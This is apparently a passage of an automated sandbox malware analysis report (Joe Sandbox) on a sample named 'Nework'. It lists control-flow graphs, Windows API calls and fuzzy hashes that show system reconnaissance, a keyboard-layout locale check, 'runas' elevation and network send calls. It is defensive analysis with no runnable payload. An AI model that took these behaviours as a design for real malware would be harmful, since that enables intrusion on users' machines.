                                                                            • Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_190000_Nework.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7a83a87ef6e8fe41b7e8bc9ae2edc74d7d5e6ff081fc80238adf07ab9be94ed8
                                                                            • Instruction ID: 469b6c43271cba13d5676e83df9b30d4a93a45de9c67fe412edef754f2fa764b
                                                                            • Opcode Fuzzy Hash: 7a83a87ef6e8fe41b7e8bc9ae2edc74d7d5e6ff081fc80238adf07ab9be94ed8
                                                                            • Instruction Fuzzy Hash: 5552D870D00248DBEF14EBB8C9997EDBBB2AF56314F644248E411673D2D7B54A88C7A2

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 716 197c40-197cc2 call 1c3f50 GetVersionExW 719 197cc8-197cf0 call 1a7860 call 195b20 716->719 720 1981be-1981db call 1ace51 716->720 727 197cf2 719->727 728 197cf4-197d16 call 1a7860 call 195b20 719->728 727->728 733 197d18 728->733 734 197d1a-197d33 GetModuleHandleA GetProcAddress 728->734 733->734 735 197d35-197d44 734->735 736 197d64-197d8f 734->736 737 197d5a-197d61 call 1ad4c4 735->737 738 197d46-197d54 735->738 739 197d91-197da0 736->739 740 197dc0-197de1 736->740 737->736 738->737 743 1981dc call 1c6aca 738->743 745 197da2-197db0 739->745 746 197db6-197dbd call 1ad4c4 739->746 741 197de3-197de5 GetNativeSystemInfo 740->741 742 197de7 GetSystemInfo 740->742 747 197ded-197df6 741->747 742->747 754 1981e1-1981e6 call 1c6aca 743->754 745->743 745->746 746->740 752 197df8-197dff 747->752 753 197e14-197e17 747->753 755 1981b9 752->755 756 197e05-197e0f 752->756 757 197e1d-197e26 753->757 758 19815f-198162 753->758 755->720 760 1981b4 756->760 761 197e39-197e3c 757->761 762 197e28-197e34 757->762 758->755 763 198164-19816d 758->763 760->755 765 19813c-19813e 761->765 766 197e42-197e49 761->766 762->760 767 19816f-198173 763->767 768 198194-198197 763->768 771 19814c-19814f 765->771 772 198140-19814a 765->772 773 197f29-198125 call 1a7860 call 195b20 call 1a7860 call 195b20 call 195c60 call 1a7860 call 195b20 call 195640 call 1a7860 call 195b20 call 1a7860 call 195b20 call 195c60 call 1a7860 call 195b20 call 195640 call 1a7860 call 195b20 call 1a7860 call 195b20 call 195c60 call 1a7860 call 195b20 call 195640 766->773 774 197e4f-197eab call 1a7860 call 195b20 call 1a7860 call 195b20 call 195c60 766->774 775 198188-198192 767->775 776 198175-19817a 767->776 769 198199-1981a3 768->769 770 1981a5-1981b1 768->770 769->755 770->760 771->755 778 198151-19815d 771->778 772->760 810 19812b-198134 773->810 797 197eb0-197eb7 774->797 775->755 776->775 780 19817c-198186 776->780 778->760 780->755 799 197eb9 797->799 800 197ebb-197edb call 1c89b1 797->800 799->800 807 197edd-197eec 800->807 808 197f12-197f14 800->808 812 197eee-197efc 807->812 813 197f02-197f0f call 1ad4c4 807->813 808->810 811 197f1a-197f24 808->811 810->758 815 198136 810->815 811->810 812->754 812->813 813->808 815->765
                                                                            APIs
                                                                            • GetVersionExW.KERNEL32(0000011C,53C1E996), ref: 00197CBA
                                                                            • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00197D1B
                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00197D22
                                                                            • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00197DE3
                                                                            • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00197DE7
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_190000_Nework.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: InfoSystem$AddressHandleModuleNativeProcVersion
                                                                            • String ID:
                                                                            • API String ID: 374719553-0
                                                                            • Opcode ID: eab77ab1d6c5a32de38ffc8972990ab5d5e8dd3d0163508435e9d31e76f8bddb
                                                                            • Instruction ID: 66af9f741ad0d48e4a575eb1a6b42f0679d8e261edd2130da8a438222a45567b
                                                                            • Opcode Fuzzy Hash: eab77ab1d6c5a32de38ffc8972990ab5d5e8dd3d0163508435e9d31e76f8bddb
                                                                            • Instruction Fuzzy Hash: F3D10770E00218ABDF14BB68DC5B7AD7B72AB56310F54429CE4166B3C2DB758F818BD2

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1010 1c638b-1c6398 call 1ca0f2 1013 1c63ba-1c63c6 call 1c63cd ExitProcess 1010->1013 1014 1c639a-1c63a8 GetPEB 1010->1014 1014->1013 1015 1c63aa-1c63b4 GetCurrentProcess TerminateProcess 1014->1015 1015->1013
                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32(?,?,001C638A,?,?,?,?,?,001C73DE), ref: 001C63AD
                                                                            • TerminateProcess.KERNEL32(00000000,?,001C638A,?,?,?,?,?,001C73DE), ref: 001C63B4
                                                                            • ExitProcess.KERNEL32 ref: 001C63C6
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_190000_Nework.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Process$CurrentExitTerminate
                                                                            • String ID:
                                                                            • API String ID: 1703294689-0
                                                                            • Opcode ID: 5c6ccab93913dbbcff0bb059ae38b071a3114deee37c1b2e300274dad011dac9
                                                                            • Instruction ID: 4e935bf429a9f138294692ea78267571be804fb0d849efc90baf909a095d6b0b
                                                                            • Opcode Fuzzy Hash: 5c6ccab93913dbbcff0bb059ae38b071a3114deee37c1b2e300274dad011dac9
                                                                            • Instruction Fuzzy Hash: CFE0B631000A88ABCB126F94DD49E5D3B6AFB68745B005418F90A8A931CB75DDD2CA81
                                                                            APIs
                                                                            • GetUserNameA.ADVAPI32(?,?), ref: 0019B05D
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_190000_Nework.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: NameUser
                                                                            • String ID:
                                                                            • API String ID: 2645101109-0
                                                                            • Opcode ID: 89dc1abc21b90a498944085ff2969a46d840593ffa4f550590b7181a0b5e76e2
                                                                            • Instruction ID: 4c15b4196b310e0ea0290536448883eb0c344c9e7356bebb0cb9ea4034cd9ad9
                                                                            • Opcode Fuzzy Hash: 89dc1abc21b90a498944085ff2969a46d840593ffa4f550590b7181a0b5e76e2
                                                                            • Instruction Fuzzy Hash: 96212CB181015C9FDB2ADF14CD65BEAB7B8FB19704F0042D9E50663181D7745B88CFA0

                                                                            Control-flow Graph

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_190000_Nework.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                                                                            • API String ID: 0-3963862150
                                                                            • Opcode ID: 3fc0af1cacd2b27a7c3166bd15325b0ece19dcfda49a62e2de2df0d798aaa883
                                                                            • Instruction ID: 9b33bb457ed53adc9bf6def33ec7e7842f8871b881918267b0e5bbf5ed45139f
                                                                            • Opcode Fuzzy Hash: 3fc0af1cacd2b27a7c3166bd15325b0ece19dcfda49a62e2de2df0d798aaa883
                                                                            • Instruction Fuzzy Hash: 63F1BE7190024C9FEF24DF54CC84BEEBBBAEB55304F5041A9F519A72C1DB749A84CB90

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 600 1d18ac-1d18dc call 1d15fa 603 1d18de-1d18e9 call 1c7360 600->603 604 1d18f7-1d1903 call 1cbc3b 600->604 609 1d18eb-1d18f2 call 1c7373 603->609 610 1d191c-1d1965 call 1d1565 604->610 611 1d1905-1d191a call 1c7360 call 1c7373 604->611 620 1d1bd1-1d1bd5 609->620 618 1d1967-1d1970 610->618 619 1d19d2-1d19db GetFileType 610->619 611->609 622 1d19a7-1d19cd GetLastError call 1c733d 618->622 623 1d1972-1d1976 618->623 624 1d19dd-1d1a0e GetLastError call 1c733d CloseHandle 619->624 625 1d1a24-1d1a27 619->625 622->609 623->622 629 1d1978-1d19a5 call 1d1565 623->629 624->609 639 1d1a14-1d1a1f call 1c7373 624->639 627 1d1a29-1d1a2e 625->627 628 1d1a30-1d1a36 625->628 632 1d1a3a-1d1a88 call 1cbb86 627->632 628->632 633 1d1a38 628->633 629->619 629->622 642 1d1a8a-1d1a96 call 1d1774 632->642 643 1d1aa7-1d1acf call 1d1312 632->643 633->632 639->609 642->643 651 1d1a98 642->651 649 1d1ad4-1d1b15 643->649 650 1d1ad1-1d1ad2 643->650 653 1d1b17-1d1b1b 649->653 654 1d1b36-1d1b44 649->654 652 1d1a9a-1d1aa2 call 1cad38 650->652 651->652 652->620 653->654 655 1d1b1d-1d1b31 653->655 656 1d1bcf 654->656 657 1d1b4a-1d1b4e 654->657 655->654 656->620 657->656 659 1d1b50-1d1b83 CloseHandle call 1d1565 657->659 663 1d1b85-1d1bb1 GetLastError call 1c733d call 1cbd4e 659->663 664 1d1bb7-1d1bcb 659->664 663->664 664->656
                                                                            APIs
                                                                              • Part of subcall function 001D1565: CreateFileW.KERNELBASE(00000000,00000000,?,001D1955,?,?,00000000,?,001D1955,00000000,0000000C), ref: 001D1582
                                                                            • GetLastError.KERNEL32 ref: 001D19C0
                                                                            • __dosmaperr.LIBCMT ref: 001D19C7
                                                                            • GetFileType.KERNELBASE(00000000), ref: 001D19D3
                                                                            • GetLastError.KERNEL32 ref: 001D19DD
                                                                            • __dosmaperr.LIBCMT ref: 001D19E6
                                                                            • CloseHandle.KERNEL32(00000000), ref: 001D1A06
                                                                            • CloseHandle.KERNEL32(001CAA82), ref: 001D1B53
                                                                            • GetLastError.KERNEL32 ref: 001D1B85
                                                                            • __dosmaperr.LIBCMT ref: 001D1B8C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_190000_Nework.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                            • String ID: H
                                                                            • API String ID: 4237864984-2852464175
                                                                            • Opcode ID: 15509a05220144466c45221481059c6ea24957b5b91ea26bc23b186e6d6ccc1a
                                                                            • Instruction ID: 321dd3f21c55defad44ab1a0ee903a0002b3459000f87e9729d644419ffa968d
                                                                            • Opcode Fuzzy Hash: 15509a05220144466c45221481059c6ea24957b5b91ea26bc23b186e6d6ccc1a
                                                                            • Instruction Fuzzy Hash: 89A13832A14184AFCF1DDF68DC92BAE3BB1AB16324F14014EF812AF391DB758952DB51

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 669 19d5ec-19d5f5 670 19d5f7-19d606 669->670 671 19d626-19d78d GetModuleFileNameA 669->671 672 19d608-19d616 670->672 673 19d61c-19d623 call 1ad4c4 670->673 683 19d790-19d795 671->683 672->673 676 19d9ba-19da14 call 1c6aca call 1c6617 call 1a7820 call 1a7860 call 1a7820 call 1971c0 672->676 673->671 708 19da1b-19da20 call 1c6aca 676->708 712 19da16 call 1c6489 676->712 683->683 685 19d797-19d96b call 1a7f20 call 1a92d0 683->685 701 19d96d-19d97c 685->701 702 19d99c-19d9b9 call 1ace51 685->702 704 19d97e-19d98c 701->704 705 19d992-19d999 call 1ad4c4 701->705 704->705 704->708 705->702 712->708
                                                                            APIs
                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0019D763
                                                                            • CreateDirectoryA.KERNELBASE(00000000,00000000), ref: 0019D87F
                                                                            • send.WS2_32(?,?,00000004,00000000), ref: 0019DA7E
                                                                            • send.WS2_32(?,?,00000008,00000000), ref: 0019DABA
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_190000_Nework.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: send$CreateDirectoryFileModuleName
                                                                            • String ID:
                                                                            • API String ID: 2319890793-0
                                                                            • Opcode ID: b69e40c1e573c79a4bb8b73a765656ef614175d1a19ef2fd58c058764f27cabb
                                                                            • Instruction ID: beeba3af8535f92c6a9933a6818c865e6bcb086c4f590e51ab055b619c352ee0
                                                                            • Opcode Fuzzy Hash: b69e40c1e573c79a4bb8b73a765656ef614175d1a19ef2fd58c058764f27cabb
                                                                            • Instruction Fuzzy Hash: EBF1F271E002189BDF24DB68DC49BEDB7B4AF56314F1042D8E819A72C2DB71AAC4CB91

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 850 19d91c-19d927 851 19d929-19d937 850->851 852 19d93d-19d96b call 1ad4c4 850->852 851->852 853 19da1b-19da20 call 1c6aca 851->853 859 19d96d-19d97c 852->859 860 19d99c-19d9ae call 1ace51 852->860 861 19d97e-19d98c 859->861 862 19d992-19d999 call 1ad4c4 859->862 865 19d9b3-19d9b9 860->865 861->853 861->862 862->860
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_190000_Nework.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 0ac078f070d7351bfcca4983303b825287d3b2069f136816b038d0298c068987
                                                                            • Instruction ID: e472e8f2990d90be719a4a5061821ad92023306021df485f2bc7f751b25c1ab0
                                                                            • Opcode Fuzzy Hash: 0ac078f070d7351bfcca4983303b825287d3b2069f136816b038d0298c068987
                                                                            • Instruction Fuzzy Hash: 1E41F472E001145BDF28DB78DC857AEB7B4AF46324F104669E82AE73D1EB30A950CB84

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 867 1976c0-197720 call 1a84e0 call 1a8180 872 19774e-1977cd call 1a7860 * 2 call 195b20 call 1a7f20 call 1971c0 867->872 873 197722-19772e 867->873 898 1977fb-197801 872->898 899 1977cf-1977db 872->899 875 197730-19773e 873->875 876 197744-19774b call 1ad4c4 873->876 875->876 877 19788a call 1c6aca 875->877 876->872 883 19788f-19795a call 1c6aca call 1a7860 call 195b20 call 1a8180 call 1a7860 call 195b20 call 1a7f20 call 1971c0 877->883 928 19795c-197968 883->928 929 197984-197995 Sleep 883->929 900 19782b-197843 898->900 901 197803-19780f 898->901 903 1977dd-1977eb 899->903 904 1977f1-1977f8 call 1ad4c4 899->904 908 19786d-197889 call 1ace51 900->908 909 197845-197851 900->909 906 197821-197828 call 1ad4c4 901->906 907 197811-19781f 901->907 903->883 903->904 904->898 906->900 907->883 907->906 914 197863-19786a call 1ad4c4 909->914 915 197853-197861 909->915 914->908 915->883 915->914 930 19797a-197981 call 1ad4c4 928->930 931 19796a-197978 928->931 932 1979bf-1979d8 call 1ace51 929->932 933 197997-1979a3 929->933 930->929 931->930 935 1979d9 call 1c6aca 931->935 937 1979b5-1979bc call 1ad4c4 933->937 938 1979a5-1979b3 933->938 942 1979de-197a2f call 1c6aca call 196c80 935->942 937->932 938->937 938->942 949 197a31 942->949 950 197a33-197a40 SetCurrentDirectoryA 942->950 949->950 951 197a6e-197b28 call 1a7860 call 195b20 call 1a7860 call 195b20 call 1a8180 call 1a8080 call 1a7860 call 195b20 call 1a7f20 call 1971c0 950->951 952 197a42-197a4e 950->952 984 197b2a-197b36 951->984 985 197b56-197b6e 951->985 954 197a50-197a5e 952->954 955 197a64-197a6b call 1ad4c4 952->955 954->955 958 197c28 call 1c6aca 954->958 955->951 962 197c2d call 1c6aca 958->962 966 197c32-197c37 call 1c6aca 962->966 986 197b38-197b46 984->986 987 197b4c-197b53 call 1ad4c4 984->987 988 197b9c-197bb4 985->988 989 197b70-197b7c 985->989 986->962 986->987 987->985 990 197bde-197be4 988->990 991 197bb6-197bc2 988->991 993 197b7e-197b8c 989->993 994 197b92-197b99 call 1ad4c4 989->994 998 197c0e-197c27 call 1ace51 990->998 999 197be6-197bf2 990->999 996 197bd4-197bdb call 1ad4c4 991->996 997 197bc4-197bd2 991->997 993->962 993->994 994->988 996->990 997->962 997->996 1003 197c04-197c0b call 1ad4c4 999->1003 1004 197bf4-197c02 999->1004 1003->998 1004->966 1004->1003
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_190000_Nework.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Sleep
                                                                            • String ID: runas
                                                                            • API String ID: 3472027048-4000483414
                                                                            • Opcode ID: 9949a650bedc17665084ba42aa2db9ba5ce987c64b059e0652a4866430b73d47
                                                                            • Instruction ID: d7368548e52902f6897cb9921f5c2ab93192e868496cda504efc891509a8bdac
                                                                            • Opcode Fuzzy Hash: 9949a650bedc17665084ba42aa2db9ba5ce987c64b059e0652a4866430b73d47
                                                                            • Instruction Fuzzy Hash: FFE16871A14148ABDF08EB78CD4ABADBB72EF52714F10825CF415AB3C6DB359A408792

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1018 19c206-19c20a 1019 19c699-19c6e1 1018->1019 1020 19c210-19c298 call 1a7860 call 195b20 call 1a7f20 1018->1020 1023 19c70b-19c726 call 1ace51 1019->1023 1024 19c6e3-19c6ef 1019->1024 1039 19c29a 1020->1039 1040 19c29c-19c2ba call 1a92d0 1020->1040 1026 19c701-19c708 call 1ad4c4 1024->1026 1027 19c6f1-19c6ff 1024->1027 1026->1023 1027->1026 1030 19c736-19c73b call 1c6aca 1027->1030 1039->1040 1043 19c358 1040->1043 1044 19c2c0-19c32b call 1a7860 call 195b20 call 1a7f20 1040->1044 1046 19c35b 1043->1046 1075 19c32d 1044->1075 1076 19c32f-19c350 call 1a92d0 1044->1076 1048 19c35f-19c362 1046->1048 1049 19c39a-19c3a4 1048->1049 1050 19c364-19c36d 1048->1050 1054 19c3ef-19c3f9 1049->1054 1055 19c3a6-19c3af 1049->1055 1050->1049 1052 19c36f-19c37a 1050->1052 1056 19c37c-19c38a 1052->1056 1057 19c390-19c397 call 1ad4c4 1052->1057 1061 19c3fb-19c404 1054->1061 1062 19c431-19c43b 1054->1062 1059 19c3dd-19c3eb 1055->1059 1060 19c3b1-19c3bd 1055->1060 1056->1057 1064 19c727 call 1c6aca 1056->1064 1057->1049 1059->1054 1069 19c3bf-19c3cd 1060->1069 1070 19c3d3-19c3da call 1ad4c4 1060->1070 1061->1062 1063 19c406-19c411 1061->1063 1066 19c43d-19c443 1062->1066 1067 19c474-19c478 1062->1067 1071 19c413-19c421 1063->1071 1072 19c427-19c42e call 1ad4c4 1063->1072 1086 19c72c call 1c6aca 1064->1086 1066->1067 1074 19c445-19c454 1066->1074 1079 19c57b-19c58d call 1a7f20 1067->1079 1080 19c47e-19c4a5 call 1a7860 call 195b20 1067->1080 1069->1064 1069->1070 1070->1059 1071->1064 1071->1072 1072->1062 1083 19c46a-19c471 call 1ad4c4 1074->1083 1084 19c456-19c464 1074->1084 1075->1076 1076->1046 1098 19c352-19c356 1076->1098 1090 19c592-19c5ad call 1c6589 1079->1090 1103 19c4a9-19c4ba 1080->1103 1104 19c4a7 1080->1104 1083->1067 1084->1064 1084->1083 1099 19c731 1086->1099 1105 19c5bd-19c5c5 1090->1105 1106 19c5af-19c5b8 call 1c6617 1090->1106 1098->1048 1099->1030 1102 19c731 call 1c6aca 1099->1102 1102->1030 1107 19c4bc-19c4dc call 1c40b0 1103->1107 1108 19c4de-19c4e9 call 1a8da0 1103->1108 1104->1103 1110 19c5d0-19c5eb call 1c6589 1105->1110 1118 19c665-19c66b 1106->1118 1117 19c4ee-19c4f8 1107->1117 1108->1117 1119 19c5fd-19c629 call 1a7860 * 2 call 19ba00 1110->1119 1120 19c5ed-19c5fb call 1c6617 1110->1120 1122 19c529-19c545 1117->1122 1123 19c4fa-19c509 1117->1123 1118->1019 1121 19c66d-19c679 1118->1121 1140 19c62c-19c647 call 1c6589 1119->1140 1120->1140 1128 19c67b-19c689 1121->1128 1129 19c68f-19c696 call 1ad4c4 1121->1129 1124 19c569-19c579 call 1a8da0 1122->1124 1125 19c547-19c567 call 1c40b0 1122->1125 1130 19c50b-19c519 1123->1130 1131 19c51f-19c526 call 1ad4c4 1123->1131 1124->1090 1125->1090 1128->1099 1128->1129 1129->1019 1130->1086 1130->1131 1131->1122 1149 19c649-19c652 call 1c6617 1140->1149 1150 19c654-19c659 Sleep 1140->1150 1152 19c65b-19c65f 1149->1152 1150->1152 1152->1110 1152->1118
                                                                            APIs
                                                                              • Part of subcall function 001A7860: __Cnd_destroy_in_situ.LIBCPMT ref: 001A7958
                                                                              • Part of subcall function 001A7860: __Mtx_destroy_in_situ.LIBCPMT ref: 001A7961
                                                                            • Sleep.KERNEL32(000003E8), ref: 0019C659
                                                                            Memory Dump Source
                                                                            • Source File: 00000010.00000002.2768105789.0000000000191000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000010.00000002.2768080142.0000000000190000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768173437.00000000001E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768204531.00000000001F2000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768226114.00000000001F4000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768252248.00000000001F5000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 00000010.00000002.2768283549.00000000001F9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_16_2_190000_Nework.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Cnd_destroy_in_situMtx_destroy_in_situSleep
                                                                            • String ID:
                                                                            • API String ID: 113500496-0
                                                                            • Opcode ID: 2946138b09b432e576e8ad3acedbe078521cce69ca4e6310ef6814e55b228b78
                                                                            • Instruction ID: 2f759ffaa5eb4de8d4272ddeb4994e9ad77689c3e2eb08153c47c779a390b93c
